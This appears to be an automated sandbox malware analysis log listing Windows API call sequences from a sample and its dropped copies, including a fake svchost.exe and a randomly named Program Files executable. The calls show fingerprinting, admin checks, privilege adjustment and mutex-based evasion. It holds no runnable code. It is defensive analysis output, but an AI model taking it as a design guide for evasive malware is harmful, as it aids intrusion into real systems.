Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C74920 PathAddBackslashA,CreateFileA,WriteFile,WriteFile,WriteFile,WriteFile,GetModuleFileNameA,WriteFile,WriteFile,WriteFile,GetUserNameA,WriteFile,WriteFile,WriteFile,GetEnvironmentVariableA,WriteFile,WriteFile,WriteFile,GetSystemDefaultLangID,memset,WriteFile,WriteFile,WriteFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,WriteFile,WriteFile,WriteFile,GetDateFormatA,WriteFile,WriteFile,WriteFile,GetTimeFormatA,WriteFile,WriteFile,WriteFile,GetTimeZoneInformation,_snprintf,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,GetSystemWindowsDirectoryA,WriteFile,WriteFile,WriteFile,WriteFile,IsUserAnAdmin,IsUserAnAdmin,WriteFile,WriteFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-18h], 00000419h 2_2_02C74920
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_01414920 PathAddBackslashA,CreateFileA,WriteFile,WriteFile,WriteFile,WriteFile,GetModuleFileNameA,WriteFile,WriteFile,WriteFile,GetUserNameA,WriteFile,WriteFile,WriteFile,GetEnvironmentVariableA,WriteFile,WriteFile,WriteFile,GetSystemDefaultLangID,memset,WriteFile,WriteFile,WriteFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,WriteFile,WriteFile,WriteFile,GetDateFormatA,WriteFile,WriteFile,WriteFile,GetTimeFormatA,WriteFile,WriteFile,WriteFile,GetTimeZoneInformation,_snprintf,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,GetSystemWindowsDirectoryA,WriteFile,WriteFile,WriteFile,WriteFile,#680,#680,WriteFile,WriteFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-18h], 00000419h 5_2_01414920
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_01384920 PathAddBackslashA,CreateFileA,WriteFile,WriteFile,WriteFile,WriteFile,GetModuleFileNameA,WriteFile,WriteFile,WriteFile,GetUserNameA,WriteFile,WriteFile,WriteFile,GetEnvironmentVariableA,WriteFile,WriteFile,WriteFile,GetSystemDefaultLangID,memset,WriteFile,WriteFile,WriteFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,WriteFile,WriteFile,WriteFile,GetDateFormatA,WriteFile,WriteFile,WriteFile,GetTimeFormatA,WriteFile,WriteFile,WriteFile,GetTimeZoneInformation,_snprintf,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,GetSystemWindowsDirectoryA,WriteFile,WriteFile,WriteFile,WriteFile,#680,#680,WriteFile,WriteFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-18h], 00000419h 6_2_01384920
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_03214920 PathAddBackslashA,CreateFileA,WriteFile,WriteFile,WriteFile,WriteFile,GetModuleFileNameA,WriteFile,WriteFile,WriteFile,GetUserNameA,WriteFile,WriteFile,WriteFile,GetEnvironmentVariableA,WriteFile,WriteFile,WriteFile,GetSystemDefaultLangID,memset,WriteFile,WriteFile,WriteFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,WriteFile,WriteFile,WriteFile,GetDateFormatA,WriteFile,WriteFile,WriteFile,GetTimeFormatA,WriteFile,WriteFile,WriteFile,GetTimeZoneInformation,_snprintf,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,GetSystemWindowsDirectoryA,WriteFile,WriteFile,WriteFile,WriteFile,#680,#680,WriteFile,WriteFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-18h], 00000419h 10_2_03214920
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,0_2_00403900
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: EntryPoint,LoadLibraryA,GetModuleFileNameA,ExitProcess,FindWindowA,GetTickCount,PostMessageA,IsUserAnAdmin,IsUserAnAdmin,ExitProcess,ExitProcess,IsUserAnAdmin,GetModuleHandleA,GetProcAddress,GetCurrentProcess,StrStrIA,GetCurrentProcessId,Sleep,StrStrIA,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,ExitProcess,0_2_00402C10
Source: C:\Windows\apppatch\svchost.exeCode function: RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,2_2_00403900
Source: C:\Windows\apppatch\svchost.exeCode function: EntryPoint,LoadLibraryA,GetModuleFileNameA,ExitProcess,FindWindowA,GetTickCount,PostMessageA,IsUserAnAdmin,IsUserAnAdmin,ExitProcess,ExitProcess,IsUserAnAdmin,GetModuleHandleA,GetProcAddress,GetCurrentProcess,StrStrIA,GetCurrentProcessId,Sleep,StrStrIA,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,ExitProcess,2_2_00402C10
Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,2_2_02C85890
Source: C:\Windows\apppatch\svchost.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,2_2_02C77020
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,2_2_02C844F0
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,2_2_02C90BE0
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,2_2_02C92320
Source: C:\Windows\apppatch\svchost.exeCode function: GetUserNameA,memset,InitializeCriticalSection,StrStrIA,2_2_02C89860
Source: C:\Windows\apppatch\svchost.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,2_2_02C8B810
Source: C:\Windows\apppatch\svchost.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,2_2_02C911C0
Source: C:\Windows\apppatch\svchost.exeCode function: CreateThread,StrStrIA,GetHandleInformation,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,CreateThread,wsprintfA,wsprintfA,wsprintfA,CreateThread,wsprintfA,2_2_02C7C9F0
Source: C:\Windows\apppatch\svchost.exeCode function: memset,VirtualQuery,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,2_2_02C71180
Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,StrStrIA,2_2_02C91150
Source: C:\Windows\apppatch\svchost.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,2_2_02C71670
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,2_2_02C8FFE0
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,2_2_02C8FDC0
Source: C:\Windows\apppatch\svchost.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,2_2_02C92590
Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA,CreateMutexA,GetLastError,2_2_02C73510
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,5_2_01425890
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetModuleFileNameA,StrStrIA,5_2_01431150
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,5_2_014311C0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: CreateThread,StrStrIA,GetHandleInformation,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,CreateThread,wsprintfA,wsprintfA,wsprintfA,CreateThread,wsprintfA,5_2_0141C9F0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,5_2_01411180
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetUserNameA,memset,InitializeCriticalSection,StrStrIA,5_2_01429860
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,5_2_0142B810
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,5_2_01417020
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,5_2_01432320
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,5_2_01430BE0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError,5_2_01413510
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,5_2_0142FDC0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,5_2_01432590
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,5_2_014244F0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,5_2_0142FFE0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,5_2_01411670
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,6_2_01395890
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetModuleFileNameA,StrStrIA,6_2_013A1150
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,6_2_01381180
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: CreateThread,StrStrIA,GetHandleInformation,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,CreateThread,wsprintfA,wsprintfA,wsprintfA,CreateThread,wsprintfA,6_2_0138C9F0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,6_2_013A11C0
